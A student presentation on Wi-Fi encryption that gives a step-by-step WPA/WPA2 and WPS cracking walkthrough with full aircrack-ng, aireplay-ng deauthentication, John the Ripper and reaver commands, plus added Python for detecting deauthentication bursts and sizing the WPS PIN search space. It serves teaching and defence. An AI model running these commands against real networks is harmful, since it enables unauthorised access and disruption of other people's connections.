WPA EXPLOITATION IN
THE WORLD OF WIRELESS
NETWORK
By Hariraj Rathod
8th sem
Department of Electronics and
Communication
WIFI – WIRELESS FIDELITY
• Wi-Fi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.
• Wireless access allows users to connect to the internet from any location within range of a wireless access point.
SOME BASIC TERMS
• MAC address or physical address: a unique identifier assigned to network interfaces for communications.
• Access point >> Wireless router
• SSID (service set identifier) >> Network name
• BSSID (basic service set identification) >> MAC address of the access point
BASIC WORKING
• When a user uses wireless internet, they generate what are called data “packets”.
• Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected to the access point.
BASIC WORKING CONTD.
• Depending on how long the computer is connected, it can generate a certain number of packets per day.
• The more users that are connected to one access point, the more packets are generated.
WIRELESS USES RADIO FREQUENCY
• 2.4 GHz Wi-Fi spectrum (diagram)
WIRELESS ENCRYPTION
• The main source of vulnerability associated with wireless networks is the method of encryption. The different types of wireless encryption are as follows:
• WEP
• WPA
• WPA2
WEP
• Stands for Wired Equivalent Privacy.
• WEP is recognizable by its key of 10 or 26 hexadecimal digits.
• The WEP protocol was not developed by researchers or experts in security and cryptography.
• The initial bytes of the key stream depended on just a few bits of the encryption key.
WEP CONTINUED
• WEP Encryption Process (diagram)
ICV: 32-bit integrity check value
IV: Initialization Vector
WEP CONTINUED
• WEP Decryption Process (diagram)
With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.
WPA OR WPA2
• Stands for Wi-Fi Protected Access.
• Created to provide stronger security.
• Still able to be cracked if a short password is used.
• If a long passphrase or password is used, these protocols are virtually uncrackable.
• WPA-PSK with TKIP (Temporal Key Integrity Protocol) or AES (Advanced Encryption Standard) uses a Pre-Shared Key (PSK) that is more than 7 and less than 64 characters in length.
• WPS (Wi-Fi Protected Setup) is a simple plug-and-play feature.
USING BACKTRACK >>
• Some basic Backtrack terms >>
• wlan1 – wireless interface
• mon0 – monitor-mode interface
• Handshake –
  - refers to the negotiation process between the computer and a Wi-Fi access point using WPA encryption.
  - needed to crack WPA/WPA2.
• Dictionary – a list of common passwords.
• .cap file – used to store captured packets.
MONITOR MODE
• Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.
• Monitor mode allows packets to be captured without having to associate with an access point first.
TOOLS USED
• Airmon-ng >> Places wireless cards in monitor mode.
• Airodump-ng (packet sniffer) >> Tool used to listen to wireless routers in the area.
• Aireplay-ng (packet injector) >> Aireplay-ng is used to inject frames.
  - Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
• Aircrack-ng >> Cracks WEP and WPA (dictionary attack) keys.
TOOLS USED CONTINUED
• Word Field (brute force)
• Reaver tool (brute force)
AIRCRACK-NG
• Select the interface to put into monitor mode.
• Command used: airmon-ng start wlan1
AIRCRACK-NG CONTINUED
• Start capturing packets.
• airodump-ng mon0
• airodump-ng mon0 --channel 1 --bssid <mac id> -w reddot
AIRCRACK-NG CONTINUED
• Deauthenticate the device connected to the access point and force it to re-exchange the WPA key.
• aireplay-ng -0 4 -a F4:EC:38:BA:6C:44 -c 90:4C:E5:B2:6F:D8 mon0, where "-0 4" tells aireplay-ng to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
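As an added detection example (not from the original slides), here is a small Python sliding-window check that flags bursts of deauthentication frames like the four injected above; the frame list is constructed, and the MAC addresses are the ones used on the slides.

```python
from collections import deque
from datetime import datetime, timedelta

# Constructed sample of 802.11 management frames, summarised the way a
# monitor-mode capture would show them: (timestamp, subtype, sender, receiver).
# The MAC addresses are the ones on the slides; the traffic itself is made up.
SAMPLE_FRAMES = [
    ("10:00:00.000", "beacon",    "F4:EC:38:BA:6C:44", "FF:FF:FF:FF:FF:FF"),
    ("10:00:01.100", "deauth",    "F4:EC:38:BA:6C:44", "90:4C:E5:B2:6F:D8"),
    ("10:00:01.150", "deauth",    "F4:EC:38:BA:6C:44", "90:4C:E5:B2:6F:D8"),
    ("10:00:01.200", "deauth",    "F4:EC:38:BA:6C:44", "90:4C:E5:B2:6F:D8"),
    ("10:00:01.250", "deauth",    "F4:EC:38:BA:6C:44", "90:4C:E5:B2:6F:D8"),
    ("10:00:02.000", "assoc_req", "90:4C:E5:B2:6F:D8", "F4:EC:38:BA:6C:44"),
    ("10:30:00.000", "deauth",    "F4:EC:38:BA:6C:44", "90:4C:E5:B2:6F:D8"),  # a single, ordinary deauth
]


def find_deauth_bursts(frames, threshold=3, window_seconds=2.0):
    """Return one (ap, client, first_seen) tuple per burst of at least
    `threshold` deauthentication frames to one client within `window_seconds`.
    A legitimate AP rarely deauthenticates the same client several times a
    second, so a burst like the one aireplay-ng -0 4 produces stands out."""
    window = timedelta(seconds=window_seconds)
    recent = {}   # (ap, client) -> timestamps of deauth frames still inside the window
    bursts = []
    for ts_text, subtype, sender, receiver in frames:
        if subtype != "deauth":
            continue
        ts = datetime.strptime(ts_text, "%H:%M:%S.%f")
        # spoofed deauths claim to come from the AP, so key on the (AP, client) pair
        key = (sender, receiver)
        q = recent.setdefault(key, deque())
        q.append(ts)
        while ts - q[0] > window:     # drop frames that fell out of the window
            q.popleft()
        if len(q) == threshold:       # report once, when the burst crosses the line
            bursts.append((sender, receiver, q[0].strftime("%H:%M:%S.%f")[:-3]))
    return bursts


if __name__ == "__main__":
    for ap, client, first in find_deauth_bursts(SAMPLE_FRAMES):
        print(f"possible deauth attack: AP {ap} -> client {client} starting {first}")
```

On the network side, Protected Management Frames (802.11w) is the fix, since forged deauthentication frames then fail their integrity check and clients ignore them.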
AIRCRACK-NG CONTINUED
• Authentication process in WPA (diagram)
AIRCRACK-NG CONTINUED
• 4-way handshake is captured.
AIRCRACK-NG CONTINUED
• Crack the WPA key using aircrack-ng, the dictionary file and the captured 4-way handshake file reddot-01.cap:
aircrack-ng -w /home/pranav/download/password.lst -b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use and "-b" the access point MAC address.
JOHN THE RIPPER
• Faster than the previously used tool.
• /pentest/password/john-1.7.6.jumbo12/run/john --stdout --incremental=All | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/test-01.cap
WORD FIELD
• Word Field is a brute-force attack.
• Command line used: wordfield [OPTION...] MINLENGTH [MAXLENGTH]
• wordfield -a -n 8 8 will output all possible alphanumeric strings which are 8 characters long.
• wordfield -a -n 8 8 | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap
• This attack is really effective on weak keys.
WORD FIELD CONTINUED
• The run below (screenshot) took 22 hrs 7 minutes and 35 seconds.
DICTIONARY AND BRUTE FORCE LIMITATIONS
• A passphrase will not necessarily be found in a dictionary list, so the dictionary attack has its limitations.
• Brute-force techniques require a lot of fast hardware and computational power.
Source: http://lastbit.com/pswcalc.asp
REAVER TOOL
• Reaver is a fantastic tool for cracking the WPS PIN, written by Craig Heffner.
• This tool exploits the 8-digit WPS PIN.
• 1 digit is a checksum digit.
• 7 unknown digits, meaning there are 10^7 (10,000,000) possible combinations, which would take approximately 116 days to break at 1 attempt every second.
REAVER TOOL CONTINUED
• WPS PIN 65020920 (screenshot)
REAVER TOOL CONTINUED
• Finding a WPS victim
• wash -i mon0
REAVER TOOL CONTINUED
CRACKING TECHNIQUE
• WPS PIN 6502-0920: the PIN is checked in two halves.
• The first half gives 10^4 (10,000) combinations.
• But since one digit of the second half is the checksum digit, its combinations reduce to 10^3 (1,000).
• This reduces the time required to break the PIN to just over 3 hours, again assuming that 1 attempt is made every second.
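An added Python example, not from the original slides, that quantifies the search-space reduction described above: it implements the WPS checksum digit from the specification, confirms that the slide's PIN 65020920 is well-formed, and converts the candidate counts into the time figures quoted at one attempt per second.

```python
def wps_checksum_digit(body: int) -> int:
    """Checksum digit appended to the 7-digit PIN body (WPS specification:
    alternate digits weighted 3 and 1, like a Luhn check)."""
    accum = 0
    while body:
        accum += 3 * (body % 10)
        body //= 10
        accum += body % 10
        body //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when the 8-digit PIN's last digit matches the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum_digit(int(pin[:7])) == int(pin[7])


def worst_case_attempts(split_verification: bool) -> int:
    """Candidates an attacker must try: 10^7 if only the whole PIN is confirmed,
    10^4 + 10^3 if the two halves are confirmed separately (checksum is derived)."""
    return 10**4 + 10**3 if split_verification else 10**7


def time_at_one_per_second(attempts: int) -> str:
    """Duration at the slides' assumed rate of one attempt per second."""
    hours = attempts / 3600
    return f"{hours / 24:.0f} days" if hours >= 48 else f"{hours:.1f} hours"


if __name__ == "__main__":
    print("65020920 well-formed:", is_valid_wps_pin("65020920"))
    for split in (False, True):
        n = worst_case_attempts(split)
        print(f"split={split}: {n:,} candidates, {time_at_one_per_second(n)}")
```

Disabling WPS PIN registration on the access point removes this search space entirely; rate limiting alone only stretches the 3-hour figure.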
REAVER TOOL CONTINUED
• reaver -i mon0 -b F4:EC:38:BA:6C:44
REAVER TOOL CONTINUED
BE SECURED
REFERENCES
• Wi-Fi security – WEP, WPA and WPA2, Guillaume Lehembre
• http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#WPS_PIN_recovery
• https://sites.google.com/site/clickdeathsquad/Home/cds-wpacrack
• http://samiux.blogspot.in/2010/04/howto-crackwpawpa2-psk-with-john.html
• http://www.zer0trusion.com/2011/09/crackingwpa-without-dictionary.html
• Tactical Network Solutions
• WiFi Security Megaprimer by Vivek Ramachandran
THANKS : )
